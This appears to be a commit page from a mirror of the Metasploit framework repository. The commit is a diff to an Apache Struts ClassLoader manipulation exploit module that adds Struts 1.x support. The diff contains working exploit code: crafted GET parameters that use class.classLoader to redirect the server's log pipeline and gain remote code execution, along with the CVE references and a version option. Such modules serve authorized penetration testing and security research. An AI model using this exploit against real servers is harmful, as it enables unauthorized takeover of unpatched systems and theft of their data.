infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #4683, @julianvilas's support for struts 1 on struts_code_exec_classloader

bug/bundler_fix
jvazquez-r7 2015-01-30 18:47:56 -06:00
parent cf891efc14 f983c8171e
commit 3471b43010
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 23 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

34
modules/exploits/multi/http/struts_code_exec_classloader.rb
View File

@ -16,11 +16,12 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Apache Struts ClassLoader Manipulation Remote Code Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in Apache Struts
versions < 2.3.16.2. This vulnerability is due to the ParametersInterceptor, which allows
access to 'class' parameter that is directly mapped to getClass() method and
allows ClassLoader manipulation. As a result, this can allow remote attackers to execute arbitrary
Java code via crafted parameters.
This module exploits a remote command execution vulnerability in Apache Struts versions
1.x (<= 1.3.10) and 2.x (< 2.3.16.2). In Struts 1.x the problem is related with
the ActionForm bean population mechanism while in case of Struts 2.x the vulnerability is due
to the ParametersInterceptor. Both allow access to 'class' parameter that is directly
mapped to getClass() method and allows ClassLoader manipulation. As a result, this can
allow remote attackers to execute arbitrary Java code via crafted parameters.
},
'Author' =>
[
@ -33,8 +34,11 @@ class Metasploit3 < Msf::Exploit::Remote
[
['CVE', '2014-0094'],
['CVE', '2014-0112'],
['CVE', '2014-0114'],
['URL', 'http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/'],
['URL', 'http://struts.apache.org/release/2.3.x/docs/s2-020.html']
['URL', 'http://struts.apache.org/release/2.3.x/docs/s2-020.html'],
['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Update-your-Struts-1-ClassLoader-manipulation-filters/ba-p/6639204'],
['URL', 'https://github.com/rgielen/struts1filter/tree/develop']
],
'Platform' => %w{ linux win },
'Payload' =>
@ -69,7 +73,8 @@ class Metasploit3 < Msf::Exploit::Remote
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"])
OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"]),
OptEnum.new('STRUTS_VERSION', [ true, 'Apache Struts Framework version', '2.x', ['1.x','2.x']])
], self.class)
end
@ -101,15 +106,22 @@ class Metasploit3 < Msf::Exploit::Remote
end
def modify_class_loader(opts)
cl_prefix =
case datastore['STRUTS_VERSION']
when '1.x' then "class.classLoader"
when '2.x' then "class['classLoader']"
end
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s),
'version' => '1.1',
'method' => 'GET',
'vars_get' => {
"class['classLoader'].resources.context.parent.pipeline.first.directory" => opts[:directory],
"class['classLoader'].resources.context.parent.pipeline.first.prefix" => opts[:prefix],
"class['classLoader'].resources.context.parent.pipeline.first.suffix" => opts[:suffix],
"class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format]
"#{cl_prefix}.resources.context.parent.pipeline.first.directory" => opts[:directory],
"#{cl_prefix}.resources.context.parent.pipeline.first.prefix" => opts[:prefix],
"#{cl_prefix}.resources.context.parent.pipeline.first.suffix" => opts[:suffix],
"#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format]
}
})